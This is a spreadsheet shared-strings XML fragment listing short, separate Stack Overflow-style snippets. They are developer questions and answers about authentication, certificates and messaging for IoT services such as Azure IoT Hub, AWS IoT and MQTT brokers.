    <t>I need to give temporary Access Keys to my clients to connect to IoT services (publish, receive, etc.).</t>
  </si>
  <si>
    <t>I'm using a shared access policy and a SAS token pair (which successfully work in ampq net lite under C#) for SASL PLAIN.</t>
  </si>
  <si>
    <t>As the clients are authenticated by mosquitto (using the password_file in the configuration) for accessing the broker, is there any way to secure individual channels?</t>
  </si>
  <si>
    <t>I couldn't find a way (that I could believe as reliable) to have Android's ServerSocket to notice a reset from NodeMCU client socket, right at once, when NodeMCU's socket is disconnected, or trying to reconnect.</t>
  </si>
  <si>
    <t>So I switched to openssl and created a certificate which my code appears to accept and run and also I am able to upload the .cer file into Alexa Skills fine.</t>
  </si>
  <si>
    <t>First, using Azure Iot Hub is really great since I'm using the device management and securing the devices and connections are easy.</t>
  </si>
  <si>
    <t>Remember I am connected to the client correctly with cognito session token, etc.</t>
  </si>
  <si>
    <t>Now How I can use above information to do the same with azure rest API.For Authentication I have seen below link which says I have to use SAS token for the same as Azure AD access token wont work.</t>
  </si>
  <si>
    <t>I try this command on raspberry pi 3b+ google-oauthlib-tool --client-secrets ~/googleassistant/credentials.json \ --scope https://www.googleapis.com/auth/assistant-sdk-prototype \ --scope https://www.googleapis.com/auth/gcm \ --save --headless and I have this error: missing option "--scope"
I use this tutorial: https://pimylifeup.com/raspberry-pi-google-assistant/</t>
  </si>
  <si>
    <t>I am using custom allocation policy in device provisioning service (DPS) to register my iot device to iot hub, in which I am triggering azure function for the same.</t>
  </si>
  <si>
    <t>I tested Cloud to Device it's working fine, however I don't know how to push firmware from Azure IoT hub.</t>
  </si>
  <si>
    <t>I'm running this command: 
az iot hub device-identity create --device-id my-device-id --hub-name my-iot-hub
But I keep getting a bad handshake error with SSL (see debug below).</t>
  </si>
  <si>
    <t>Jira simply accepts the parameters os_username and os_password or you can request a basic authentication challenge using os_authType=basic.</t>
  </si>
  <si>
    <t>That means no Serial to monitor, but therefore I used this very useful trick:
http://ava.upuaut.net/?p=757
If anybody knows a way to disable UBX messages from the NEO-6M, please let me know.</t>
  </si>
  <si>
    <t>If wildcards are not used, a device must use this string in its subscription topic to receive commands that are published on their topic.</t>
  </si>
  <si>
    <t>You need to denote a WiFi or Ethernel client instance to establish connection to the broker via MQTT libraries.</t>
  </si>
  <si>
    <t>This is a bug that has already been reported - at the moment if you use MQTT, the token is checked when the device connects, but the device is not disconnected by IoT Hub when the token expires.</t>
  </si>
  <si>
    <t>This property is not supported on the telemetry path when a Device sends a telemetry message to IoTHub.</t>
  </si>
  <si>
    <t>Check this:
&lt;?php
$servername = "localhost";
$username = "root";
$password = "*************";
$dbname = "testbox1";
try {
    $conn = new PDO("mysql:host=$servername;dbname=$dbname", $username, $password);
    // set the PDO error mode to exception
    $conn-&gt;setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $temp = $_POST["temp"];
    $light = $_POST["light"];
    $sql = $conn-&gt;prepare("INSERT INTO sensor (temp, light) VALUES (?, ?</t>
  </si>
  <si>
    <t>Here is an example application that should help demonstrate how to authenticate IoT with Cognito:
https://github.com/awslabs/aws-iot-chat-example
For explicit instructions, you can read:
https://github.com/awslabs/aws-iot-chat-example/blob/master/docs/authentication.md</t>
  </si>
  <si>
    <t>There are 2 cases when using cognito with AWSIoT:
Cognito Authenticated Pool:
In this case, you can define a policy at pool level which is less restrictive.</t>
  </si>
  <si>
    <t>The token that Google issued is a short-live token which will expire at a short time.</t>
  </si>
  <si>
    <t>try to send a D2C message on the following topic:
Note, that the content-encoding is utf-8.</t>
  </si>
  <si>
    <t>If an MQTT client attempts to connect to the
  AWS IoT message broker with the cleanSession set to false, the client
  will be disconnected.</t>
  </si>
  <si>
    <t>You can use it to monitor Device identity operations,Device telemetry,Cloud-to-device messages,Connections,File uploads and Message routing.</t>
  </si>
  <si>
    <t>Support TLS: required to establish a secure communication channel with Azure IoT Hub.</t>
  </si>
  <si>
    <t>For example, if it is running OS based on Linux or Windows you can use Python (Boto), if it is , you can use SDK in Embedded C.
You should consider correct policies attached to the certificate of your device.</t>
  </si>
  <si>
    <t>The following section in the docs explains how you can use the two different types of key: https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-devguide-security#use-sas-tokens-in-a-device-app</t>
  </si>
  <si>
    <t>There's a good example of this at
https://github.com/esp8266/Arduino/blob/master/libraries/ESP8266HTTPClient/examples/BasicHttpsClient/BasicHttpsClient.ino
You'll need to know the SSL fingerprint for the Nest server.</t>
  </si>
  <si>
    <t>You need to specifically enable HTTP requests for your App Service in the Azure Portal.</t>
  </si>
  <si>
    <t>If an MQTT client attempts to connect to the AWS IoT message broker with the cleanSession set to false, the client will be disconnected.</t>
  </si>
  <si>
    <t>In essence, what you're needing to do is turn the client into a server that accepts a connection from another server... a client server that doesn't have the reliable layers of security that your server (probably) has.</t>
  </si>
  <si>
    <t>If you want to secure your database, you can use the methods described here to authenticate your request with a token.</t>
  </si>
  <si>
    <t>Use this tag for questions regarding specifying content encoding on HTTP requests.</t>
  </si>
  <si>
    <t>It combines: Azure Sphere certified microcontrollers, the Azure Sphere Operating System, and the Azure Sphere Security Service.</t>
  </si>
  <si>
    <t>The response must include a WWW-Authenticate header field containing a challenge applicable to the requested resource.</t>
  </si>
  <si>
    <t>A principal in a system with security trusts another principal if it allows its security to depend on assertions made by that other principal.</t>
  </si>
  <si>
    <t>Example in Asp.Net forms authentication:
User tries to visit http://localhost/myProject/findex.aspx but is
not authenticated.</t>
  </si>
  <si>
    <t>Many servers support some notion of an authentication token, which can be used to authenticate a request to the server without sending the user's actual password.</t>
  </si>
  <si>
    <t>A gateway machine should be listed under all possible hostnames by which it may be recognized:
gateway (server,,) (server-sn,,) (server-bb,,)
The getnetgrent functions should normally be used to access the netgroup database</t>
  </si>
  <si>
    <t>The auth_socket is MySQL's authentication plugin that authenticates clients that connect from the local host through the Unix socket file.</t>
  </si>
  <si>
    <t>HttpOnly is a flag in the cookie header, indicating that the browser should hide this cookie from JavaScript and only use it for HTTP and HTTPS requests.</t>
  </si>
  <si>
    <t>For example, once a user has been authenticated to the web server, the
  user's next HTTP request (GET or POST) should not cause the web server
  to ask for the user's account and password again.</t>
  </si>
  <si>
    <t>The KeyNotFoundException is an Exception of the .NET that is thrown when the key specified for accessing an element in a collection does not match any key in the collection.</t>
  </si>
  <si>
    <t>See the tag ssl for more information on Transport Layer Security (tls) and its predecessor, Secure Sockets Layer (ssl).</t>
  </si>
  <si>
    <t>using powershell with net use "\\share\folder" "password" /USER:"user" works and unc can be browsed
Tried using WNetAddConnection2 as in Prevent WNetAddConnection2 class which allows prohibited user to access shared folder
Tried using WNetUseConnection with both user prompt and without (neither works)
FolderPicker or FileOpenPicker but these seem to be disabled for IoT Core (https://ms-iot.github.io/content/en-US/win10/UnavailableApis.htm).</t>
  </si>
  <si>
    <t>I am able to fetch all the shared access policies and their respective primary keys as an array / object using the listkeys function in the Azure ARM template json as below
which results in 
....
      ]
I need to know how to filter only the primarykey of the "iothubowner" policy ?</t>
  </si>
  <si>
    <t>I'm generating a signed URL using the below code (I'll switch to Cognito Identities if I get this working rather than using the fixed key/secret)
The protocols page in the iot documentation seems to suggest that if I point at /mqtt I'm indicating I'll be using MQTT.</t>
  </si>
  <si>
    <t>I've simplified my code to just use the 'Hello World' example in the Paho documentation, and as far as I can tell I've done things correctly (including using my device path as the ClientID, the JWT token as the password, specifying an 'unused' userName field and explicitly requiring MQTT v3.1.1).</t>
  </si>
  <si>
    <t>Here you can find a program I made to send data to my Azure IoT Hub via HTTPS using SIMCOM Modules (SIM800, SIM900...): https://developer.mbed.org/users/BorjaTarazona/code/Azure_SIM800_HelloWorld/
I had the same issue, my problem was that you need to write before your shared access signature "Authorization: ".</t>
  </si>
  <si>
    <t>https://www.hivemq.com/blog/mqtt-essentials-part-5-mqtt-topics-best-practices/ 
Talking about your specific case
Each device needs to have a unique identity to send a command to a particular device.</t>
  </si>
  <si>
    <t>The Sustainsys.Saml2 library (formerly named Kentor.AuthServices) is an LGPL open source library that adds SAML2 service provider functionality to .NET for various ASP.NET programming models (Http Module, Mvc, Owin, ASP.NET Core)
The project source and documentation is available in the GitHub repo.</t>
  </si>
  <si>
    <t>Strobe Media Playback comes with the predefined user interface and supports all the same video features as OSMF, including Progressive Download, RTMP streaming, Live Streaming, HTTP Dynamic Streaming and content protection with Adobe Flash Access 2.0.</t>
  </si>
  <si>
    <t>libcurl supports SSL certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, Kerberos), file transfer resume, http proxy tunneling and more!</t>
  </si>
  <si>
    <t>After fighting with java, I finally got the $JAVA_HOME variable to stop throwing errors, and was able to launch broker.sh, however it seems to require root permissions to launch which is not in keeping with the install instructions I found here: https://docs.wso2.com/display/IOTS330/Installing+on+Linux+or+OS+X
As this appears to be the "official" instructions for linux, I would expect that there would be a more comprehensive set of instructions.</t>
  </si>
  <si>
    <t>Try to add additional spaces inside your if statement:
The complete script is now:
Here's a demonstration showing that it works:
$ chmod +x ./myscript 
$ touch foo.crt
$ ./myscript 
Please enter an existing Client Name:
foo
Client's cert found:foo
$ ./myscript
Please enter an existing Client Name:
bar
[ERROR]: Client Public Key Certificate not found: bar.crt</t>
  </si>
  <si>
    <t>every broker can deal with anonymous clients, M2m.eclipse.org is one of those...
Are there better brokers for a job like this (that are also free) or
  would mosquitto be enough?</t>
  </si>
  <si>
    <t>I have been trying to use MQTTlens and mosquitto but same problem, not authorised
Bellow is command for mosquitto
This are devices data
I have used host
xwc8vm.messaging.internetofthings.ibmcloud.com
and client 
d:xwc8vm:devicetype:mydevice
I even tried using http://mqtt-helper.mybluemix.net/?cm_sp=dw-bluemix--nospace--answers, but got this error
(23:42:45.044)Failed to connect to xwc8vm.messaging.internetofthings.ibmcloud.com:1883.</t>
  </si>
  <si>
    <t>The ESP8266 is more than capable of using HTTPS, in fact the latest ESP8226 Arduino codebase includes a WiFiClientSecure class for connecting to HTTPS servers.</t>
  </si>
  <si>
    <t>Some features :
Nuget Client package
Cache Notifications
Local cache
Concurrency Methods
Eviction &amp; Expiration
High Availability
Encryption &amp; Security features 
More info
http://msdn.microsoft.com/en-us/magazine/ff714581.aspx
http://msdn.microsoft.com/en-us/library/hh334305(v=azure.10).aspx</t>
  </si>
  <si>
    <t>Check out this website this might help you for getting started with OAuth 2.0
http://code.tutsplus.com/articles/oauth-20-the-good-the-bad-the-ugly--net-33216</t>
  </si>
  <si>
    <t>A CAPTCHA or Captcha is a type of challenge-response test used in computing as an attempt to ensure that the response is not generated by a computer.</t>
  </si>
  <si>
    <t>Go to the following folder:
Create a file named :
sudo nano 10proxy
Without authentication add the following line:
Acquire::http::Proxy "http://yourproxyaddress:proxyport/";
With authentication:
Acquire::http::Proxy "http://username:password@yourproxyaddress:proxyport/";
The /at the very end was important.</t>
  </si>
  <si>
    <t>The library https://github.com/PeculiarVentures/webcrypto-liner will give you a crypto object you can use in the browser (even downlevel/IE) https://github.com/PeculiarVentures/node-webcrypto-ossl will give you one for Node.</t>
  </si>
  <si>
    <t>Steganography is the art and science of writing hidden messages in such a way that no one apart from the sender and intended recipient even realizes there is a hidden message.</t>
  </si>
  <si>
    <t>I am running the Getting started with IOT Hub example, for Node.js:
I followed all steps, but when I run the readDeviceToCloudMessage application, I receive this error in my console:
name: 'AmqpProtocolError',
  message: 'undefined:Attempted to perform an unauthorized operation.</t>
  </si>
  <si>
    <t>I'm using AWS CloudFormation to create an IoT , Policy and Certificate.</t>
  </si>
  <si>
    <t>If the LTPA token is not yet present the user must authenticate normally.</t>
  </si>
  <si>
    <t>See https://azure.microsoft.com/en-us/documentation/articles/iot-hub-sas-tokens/
Basically, you create a certificate and key, drop those on the device, insert the thumbprint of the certificate in the device registry, and then in your device code use the certificate instead of setting the Authorization header.</t>
  </si>
  <si>
    <t>To authorize theses devices to send data on my iothub, I generate and specify for each one a SAS Token.</t>
  </si>
  <si>
    <t>Using the aws-sdk we don't need to use the certificates to
  publish in the AWS IoT, we just use the AWS credentials to do this.</t>
  </si>
  <si>
    <t>The Network Server handles: end-device authentication, end-device message de/encryption on the session level, end-device duplicated messages, end-device replayed messages, end-device data rate throttling, data/routing exchange with user applications (This is where commercial Networks Server solutions have loads of options), and more...</t>
  </si>
  <si>
    <t>If you only want to create the Lets Encrypt certificates, have a look into obtain-letsencrypt-certs-dehydrated-lexicon.yml - even if you dont want to use Ansible, you can also manually reproduce every step on the console or use another automation tool like Chef or Saltstack (although I cant recommend that personally).</t>
  </si>
  <si>
    <t>For now it says "bad token", so, it means that he didn't receive my post parameters.</t>
  </si>
  <si>
    <t>I created a login form so that I could log into cognito user pool and would get an ID token from it.</t>
  </si>
  <si>
    <t xml:space="preserve">
I have created thing , certificates , policy and attached them successfully using python.</t>
  </si>
  <si>
    <t>And I have to destroy the client using IoTHubDeviceClient_LL_Destroy and create client again using IoTHubDeviceClient_LL_CreateWithAzureSphereDeviceAuthProvisioning to make it work.</t>
  </si>
  <si>
    <t>Sorry, this maybe a little late
This error is probably caused because of a corrupted temp package which was interrupted (In dpkg).</t>
  </si>
  <si>
    <t>I am assuming the thing is created and it is attached to certificate along with the policy.</t>
  </si>
  <si>
    <t>ERRORS
EAGAIN or EWOULDBLOCK
The socket is marked nonblocking and no connections are present to be accepted.</t>
  </si>
  <si>
    <t>There are 2 ways depending on your infrastructure setup (Raspi, big Cloud server or something in between):
If you have an externally accessible Server (means your Gitlab host is callable from the Lets Encrypt servers, which is needed for Lets Encrypts automatic mechanism of verifying that you "own" a certain domain like  and the corresponding and DNS resolved server/host) the only thing needed (from Gitlab version 10.7 on) is to add an s to the http in your Gitlab URL configuration in /etc/gitlab/gitlab.rb (as marcolz already mentioned):
external_url 'https://gitlab.yoursite.com'
From the docs in https://docs.gitlab.com/omnibus/settings/ssl.html#let-39-s-encrypt-integration:
Omnibus-gitlab can automatically fetch and renew certificates from
  Let's Encrypt for you.</t>
  </si>
  <si>
    <t>iot.eclipse.org:8883)
Just when I'm trying to connect to my own mosquitto instance, it fail 
In the mosquitto log shows: 
OpenSSL Error: error:1408A10B:SSL routines:SSL3_GET_CLIENT_HELLO:wrong version number
My mosquitto.conf looks like this
conf.d contains:
The certificates are generated using let's encrypt- Connection from MQTT-Dash (Adnroid App) works perfectly.</t>
  </si>
  <si>
    <t>I had find out certain package in python for wrapping up SSL security while opening a socket.</t>
  </si>
  <si>
    <t>I have already provisioned my device with thumbprint of SSL certificate on IOT Hub but not sure how to send events to IOT Hub using certificate authorization.</t>
  </si>
  <si>
    <t>I created a new microsoft account and activated an azure promo code / azure pass.</t>
  </si>
  <si>
    <t>Fehlerbeschreibung: System.Net.WebException: Error getting response stream (Write: The authentication or decryption has failed.</t>
  </si>
  <si>
    <t>We were planing on using anomaly function built into stream analytics in  azure  for accomplishing this task.</t>
  </si>
  <si>
    <t>Part of the OAuth signature is a timestamp, which is generated when you make the request.</t>
  </si>
  <si>
    <t>Modify the server to add the header Access-Control-Allow-Origin: * to enable cross-origin requests from anywhere (or specify a domain instead of *).</t>
  </si>
  <si>
    <t>Superpower generates friendlier error messages through its support for token-based parsers.</t>
  </si>
  <si>
    <t>Bogus is a .NET library for generating fake data, with support for C#, F# and VB.NET.</t>
  </si>
  <si>
    <t>In portal.azure.com push both modules to your iot edge host with the following route:
4. after a few minutes running docker logs edgeHub you will see:
018-10-03 17:51:53.270 +00:00 [INF] - Successfully generated identity for clientId ubuntu1/sample and username ksayeaz3166.azure-devices.net/ubuntu1/sample/?api-version=2017-11-08-preview&amp;DeviceClientType=iothubclient%2f1.2.5%20(native%3b%20Linux%3b%20x86_64)
2018-10-03 17:51:53.275 +00:00 [INF] - ClientAuthenticated, ubuntu1/sample, 2ae77b92
2018-10-03 17:51:53.345 +00:00 [INF] - New device connection for device ubuntu1/sample
Repro on Pi:
1.</t>
  </si>
  <si>
    <t>you need an sms gateway ( we use these guys : http://inteltech.com.au/, but nearly any will do )
Your easiest option is to find one where you can insert SMS'es for sending via a URL, eg in our case the URL looks like this:
http://inteltech.com.au/secure-api/send.single.php?username=[user]&amp;key=[longcode]&amp;method=http&amp;senderid=[id]&amp;sms=[phonenumber]&amp;message=[here's the message]
it's extremely simple to use.</t>
  </si>
  <si>
    <t>The JavaScript client supports the following browser environments:
Chrome 8+
Firefox 3.5+
MSIE 8+
Safari 4+
The library supports the following authentication and authorization methods
  - OAuth2
Documentation
Getting Started
Reference Docs
Samples
Support
Issues
Links
Blogs
Announcements
Groups
Discuss
Source code
GitHub</t>
  </si>
  <si>
    <t>I created an individual enrollment on the hub using a certificate I generated using the "dice_device_enrollment" tool of the SDK.</t>
  </si>
  <si>
    <t>Have a look at informations about RFC HTTP Protocol
You can also look at :
http://en.wikipedia.org/wiki/HTTP_cookie#Setting_a_cookie</t>
  </si>
  <si>
    <t>The CORS headers aren't set for that endpoint, specifically the 'Access-Control-Allow-Origin' header.</t>
  </si>
  <si>
    <t>If you subscribe to receive a message on the topic with device type set to all, that would only be the devices, gateways and applications that are registered to that organization.</t>
  </si>
  <si>
    <t>Support SHA-256 (optional): necessary to generate the secure token for authenticating the device with the service.</t>
  </si>
  <si>
    <t>WS-Security, or web service security is a soap extension which provides eg signing of soap messages.</t>
  </si>
  <si>
    <t>Edit1: REST APIs might be the obvious choice to attempt to do this; However, having tried these APIs via manual request, it seems the response does not provide the allow-access-control-origin header, so I can't call them from ajax due to CORS.</t>
  </si>
  <si>
    <t>I have a requirement to create a https request with certificate file(.pfx) same as that of we do in node.js like below:
Right now in ardiuno I can see only API to create HTTP request like below but there is no option to send the certificate:
Edit: I have added a WIFI shield on the board so that it can support encryption
but still unable to find any solution.</t>
  </si>
  <si>
    <t>For some reason today after 2 months my IoT hub connection string did not work anymore which gave me a :
Exception when sending message:{"Message":"ErrorCode:IotHubUnauthorizedAccess;Unauthorized","ExceptionMessage":""}
I later found out that my connectionString changed in the IoT for which I use a free license.</t>
  </si>
  <si>
    <t>EDIT:
Following a suggestion from a comment, I was eventually led to this page:
https://docs.microsoft.com/en-us/rest/api/iothub/device/senddeviceevent
Using the suggested HTTP POST (with my device specifics replaced), I am now getting a 401 error (IotHubUnauthorizedAccess).</t>
  </si>
  <si>
    <t>FYI, right now when I'm running the storage adapter microservice locally, I get this error:
"{"Name":"StorageAdapter","Status":{"IsHealthy":false,"Message":"Storage check failed"}..."
...which is preceeded by a caught exception with this messae:
"AuthKey = '((Microsoft.Azure.Documents.Client.DocumentClient)this.client).AuthKey' threw an exception of type 'System.ArgumentNullException'"</t>
  </si>
  <si>
    <t>Solution:
You need to either:
remove the unique restriction 
do not insert the key
determine and resolve why an already existing key is attempting to be inserted
References
http://ora-00001.ora-code.com/
http://www.techonthenet.com/oracle/errors/ora00001.php
http://www.dba-oracle.com/sf_ora_00001_unique_constraint_violated.htm</t>
  </si>
  <si>
    <t>When a web client sends request through HTTP, I want to start a subprocess with sudo privileges.</t>
  </si>
  <si>
    <t>Code:
The exception thrown is
Additional information: Requested Windows Runtime type 'Microsoft.Maker.Serial.UsbSerial' is not registered.</t>
  </si>
  <si>
    <t xml:space="preserve">
SDK: C#
Version: Microsoft.Azure.Devices.Client 1.2.3
Bug reproduction code:
Let the following run for 15 minutes or so* and you'll see that sending still succeeds although the token should have expired.</t>
  </si>
  <si>
    <t>When I connect to the broker from my PC with the same cert with the following command, the connection is accepted by the broker and the message is delivered to the subscriber.</t>
  </si>
  <si>
    <t>Ive tried using the  from my IoT hub endpoints and also the connection string - primary key from the access policy for iothubowner but again it rejects it.</t>
  </si>
  <si>
    <t>Relavant code:
I don't know how to validate the "sharedAccessKey" on connectionString var
Error(on await deviceClient.SendEventAsync(message) line):
Exception thrown: 'System.Exception' in System.Private.CoreLib.ni.dll
No such host is known.</t>
  </si>
  <si>
    <t>- skipping
  Could not fetch URL https://www.piwheels.hostedpi.com/simple/pip/: There was a problem confirming the ssl certificate: Can't connect to HTTPS URL because the SSL module is not available.</t>
  </si>
  <si>
    <t>I gave the wrong credentials in the arduino for the mqtt server, but still i am able to connect to the mqtt server and receive messages from the nodemcu board.</t>
  </si>
  <si>
    <t>Question
Is it possible to make a successful X509 client authentication https request targeting Windows 14393?</t>
  </si>
  <si>
    <t>I have a greengrass setup where I would like to have a raspberryPi constantly scanning for BLE devices and if anything is found publish a message via MQTT.</t>
  </si>
  <si>
    <t>I'm confused... Can someone clarify or give me an example of how to authenticate to azure iot hub and then relay the message to the service-bus?</t>
  </si>
  <si>
    <t>Overall, it's not a real problem since, if the Broker receives invalid data, it response with an error message which I catch.</t>
  </si>
  <si>
    <t>To get the status to 200 instead of 0 I needed to modify the response header on the arduino side to include: 
Access-Control-Allow-Origin: *
To allow Cross Origin Domain Requests in FireFox.</t>
  </si>
  <si>
    <t>I breadboarded a circuit based on http://www.digikey.com/us/en/techzone/microcontroller/resources/articles/protecting-inputs-in-digital-electronics.html.</t>
  </si>
  <si>
    <t>Azure IoT Hub is only working with SSL, which they don't advertise at the section you probably looked at for the username/password information.</t>
  </si>
  <si>
    <t>Runtimes other than browsers can all freely make cross-origin requests without restrictions.</t>
  </si>
  <si>
    <t>The main differences when it comes to Device to Cloud messaging:
IoT hub
protocols: Supports MQTT, MQTT over WebSockets, AMQP, AMQP over WebSockets, and HTTPS.</t>
  </si>
  <si>
    <t>This will make the bridge lib to add a -K flag to curl so it ignores security ssl certs etc...</t>
  </si>
  <si>
    <t>There are multiple ways of retrieving Aws IOT policy information and find out if they are attached to targets (principals / certificates).</t>
  </si>
  <si>
    <t>For MQTT supported on Azure IoT Hub, there is only one active connection of one registered device Id at the same time.</t>
  </si>
  <si>
    <t>You can read about this here: https://firebase.google.com/docs/cloud-messaging/auth-server
If you really want to re-use the reg ID it should be possible, though... try the sketch posted in FirebaseExtended/firebase-arduino issue #250, which other have reported as working when the example sketch did not, with the same error you encountered.</t>
  </si>
  <si>
    <t>You still would not be able to reject the messages but you could for instance route the messages into some "invalid message" queue - or just don't route them anywhere.</t>
  </si>
  <si>
    <t>Each individual device you have registered will have a specific /shadow/update/accepted topic that you can subscribe to.</t>
  </si>
  <si>
    <t>If you have the leaf certificate on the device, you can register the signing cert with the Device Provisioning Service and use enrollment group.</t>
  </si>
  <si>
    <t>Data Encryption is the process of encoding messages or information in such a way that only authorized parties can read it</t>
  </si>
  <si>
    <t>Use AWS WAF to block or allow requests based on conditions, such as the IP addresses that requests originate from or values in the requests.</t>
  </si>
  <si>
    <t>The same origin policy, which is enforced by Web browsers, limits JavaScript in a document loaded from one origin from accessing data from another origin.</t>
  </si>
  <si>
    <t>For communication errors, the Message will contain the error details from the network provider and, with .Net 4.5 and above, the InnerException will contain the relevant Win32Exception.</t>
  </si>
  <si>
    <t>Beside the ID Token, OpenID Connect inherits access tokens, refresh tokens and other defined entities from OAuth2.0.</t>
  </si>
  <si>
    <t>In , Data Encryption is the process of encoding messages or information in such a way that only authorized parties can read it.</t>
  </si>
  <si>
    <t>Current security standards forbid running any SSL version or TLS 1.0 (due to their various flaws).</t>
  </si>
  <si>
    <t>Basic authentication was introduced with RFC1945 (HTTP/1.0) and is historically the first mechanism for authenticating at the HTTP layer level.</t>
  </si>
  <si>
    <t>It can encrypt and decrypt a message when I tell it to generated its own keys but if I were to take the exact same XML of the generated keys gotten from ToXmlString and give them to it through FromXmlString then it complains about "System.Security.Cryptography.CryptographyException: Couldn't decode XML...".</t>
  </si>
  <si>
    <t>You can use this endpoint: https://developer.foursquare.com/docs/users/checkins
To get your own 5 most recent check-ins, your http request will be something like:
https://api.foursquare.com/v2/users/self/checkins?limit=5&amp;sort=newestfirst&amp;oauth_token=XXXXX&amp;v=20140328</t>
  </si>
  <si>
    <t>According to the offical document  for Azure IoTHub, the error code 400 means "The body of the request is not valid; for example, it cannot be parsed, or the object cannot be validated.".</t>
  </si>
  <si>
    <t>If no pending connections are present on the queue, and the socket is not marked as nonblocking, accept() blocks the caller until a connection is present.</t>
  </si>
  <si>
    <t>This tag is used for Google's Identity Toolkit(gitkit) library for Node server, which can be found at
https://github.com/googlesamples/identity-toolkit-node</t>
  </si>
  <si>
    <t>I'm using esp-32 esp-idf HID library (https://github.com/espressif/esp-idf/tree/master/examples/bluetooth/ble_hid_device_demo) to make a custom keyboard that sends scan codes to an android device.</t>
  </si>
  <si>
    <t>I've got a cert generated, a liberal access policy and stole the endpoint from a device I created.</t>
  </si>
  <si>
    <t>For Unauthenticated user create a pool for users and region in AWS.</t>
  </si>
  <si>
    <t>These header fields can be used by HTTP servers to store state (called cookies) at HTTP user agents, letting the servers maintain a stateful session over the mostly stateless HTTP protocol.</t>
  </si>
  <si>
    <t>after one second) or the response is invalid, the authentication will be aborted and a new challenge will be generated next time.</t>
  </si>
  <si>
    <t>Minimal implementations
Web
Include the required JS headers
Put a placeholder for containing the button
Render the button and handle user sign-in
function startApp() {
  gapi.load('auth2', function() {
    gapi.client.load('plus','v1').then(function() {
      gapi.signin2.render('signin-button', {
          scope: 'https://www.googleapis.com/auth/plus.login',
          fetch_basic_profile: false });
      gapi.auth2.init({fetch_basic_profile: false,
          scope:'https://www.googleapis.com/auth/plus.login'}).then(
            function (){
              console.log('init');
              auth2 = gapi.auth2.getAuthInstance();
              auth2.isSignedIn.listen( function() {
                  console.log(auth2.currentUser.get());
                });
              auth2.then(function(resp){
                  console.log(auth2.currentUser.get());
                });
            });
    });
  });
}</t>
  </si>
  <si>
    <t>Unable to request signed cert
To replicate this just follow this set up procedure
https://blog.hypriot.com/post/setup-kubernetes-raspberry-pi-cluster/
Can anyone help with my understanding of what is going wrong and how to fix as I cannot find a solution on the Kubernetes trouble shooting?</t>
  </si>
  <si>
    <t>You can enable debug logs for edgeHub by adding RuntimeLogLevel environment variable with value debug to the deployment (from the portal go to Set modules -&gt; Configured advanced Edge runtime settings)
Another way to enable debug logs is by updating the IoT Edge security manager config file 
Replace env: {} with 
Save the file and restart the IoT Edge security manager.</t>
  </si>
  <si>
    <t>I have created gateways and devices but they don't show up when I attempt to create an edge rule.</t>
  </si>
  <si>
    <t>How to redirect all http, https request in network  to apache server for creating firewall in raspberrypi..?</t>
  </si>
  <si>
    <t>I am trying to access the setup pi's hostname, this is the tutorial I am using: https://docs.donkeycar.com/guide/install_software/ 
I am creating something which can be used to login to wifi on first boot.</t>
  </si>
  <si>
    <t>For that, request header should have to sign with the public certificate of the iot core server.</t>
  </si>
  <si>
    <t>The runtime will call Task IEventProcessor.ProcessEventsAsync(PartitionContext context, IEnumerable messages) any number of times after you have registered the eventprocessor and before unregistering.</t>
  </si>
  <si>
    <t>(Auth tokens are normally created with a separate request which does include the user's credentials.)</t>
  </si>
  <si>
    <t>It secures SOAP messages according to specifications in the WS-Security stack.</t>
  </si>
  <si>
    <t>Commonly they expose resources that can be accessed, created, or modified using certain specified http requests (e.g.</t>
  </si>
  <si>
    <t>I pieced together a Arduino Mega 2560 with a SeeedStudio NFC shield 2.0, and used the following libraries:
https://github.com/Seeed-Studio/PN532
https://github.com/don/NDEF
I am trying to write some texts into a MiFare Classic card (1024bit, 32 partitions, 64bit ID), but I kept getting the error:
Error.Block Authentication Failed for 4.</t>
  </si>
  <si>
    <t>Now your WSGI process only needs permissions to connect to the listening socket, which can be easily managed either via permissions on a Unix socket, or simply throwing access control to the wind and opening a TCP  socket bound to the localhost address (so that only processes on the local machine can connect).</t>
  </si>
  <si>
    <t>See also: https://serverfault.com/questions/679393/captive-portal-popups-the-definitive-guide/
If you want to avoid having the pop-up window, but not allow http probes through, then you have to return the same success message back that the http probe is expecting - this will fool it into thinking it is not behind a captive portal.</t>
  </si>
  <si>
    <t>It is throwing me AMQJS0008I Socket closed error
I tried connecting to the same endpoint with the STS credentials (AssumeRoleUsingWebIdentity) and roles generated via AWS CLI &amp; it worked.</t>
  </si>
  <si>
    <t>The first policy must be attached to an Amazon Cognito identity pool role and allow identities from that pool to make a publish call.</t>
  </si>
  <si>
    <t>Although the certificate chain is no more complete then (the signer of the intermediate CA is missing), IoTHub approves the certificate chain during connection establishment.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a class in the qt library that provides a Secure Sockets Layer (ssl)-encrypted network socket.</t>
  </si>
  <si>
    <t>Webhooks APIs allow applications to subscribe to Forge events, and receive notifications when they occur.</t>
  </si>
  <si>
    <t>The following code piece you can reference:
Update:
You can convert IRandomAccessStream to System.IO.Stream like this:
Stream writeStream = destinationStream.AsStreamForWrite();
Stream readStream = sourceStream.AsStreamForRead();</t>
  </si>
  <si>
    <t>Also, all TLS/SSL related functions in the net module (you use net.cert.verify) were extracted into the tls module a while ago.</t>
  </si>
  <si>
    <t>Generate an access token in your IoT Central application, see the following screen snippet:
Add this access token to your function application settings.</t>
  </si>
  <si>
    <t>Webhook URL: We use secure callbacks in order to send you messaging events.</t>
  </si>
  <si>
    <t>I am not a guy from Web related field, but i need to implement SSL security while i send some data from my python client to a open source MQTT broker.</t>
  </si>
  <si>
    <t>That way, the HTTP requests could be sent over the Internet, but short of guessing the URLs, nobody would be able to access them as the requests would be encrypted.</t>
  </si>
  <si>
    <t>My requirement is that device-clients be the first to make contact and connect to the server rather than the other way round and server be open to receiving authentication requests from n number of such device-clients.</t>
  </si>
  <si>
    <t>When I'm using http, everything works fine, but when I'm trying to make the REST calls via https, I always get an error that the SSL certificate fingerprint does not match.</t>
  </si>
  <si>
    <t>If I use incorrect credentials, there is an HTTP 401 response and the Android never returns from the "Authenticating" dialog box.</t>
  </si>
  <si>
    <t>I'd like to set my CA root cert (currently available via WiFiClientSecure library) and use convenient HTTPClient library for making request.</t>
  </si>
  <si>
    <t>Then I login with admin/admin credentials which logins successfully but right after that it posts an message on the phone that it is receiving policy and here it stops.</t>
  </si>
  <si>
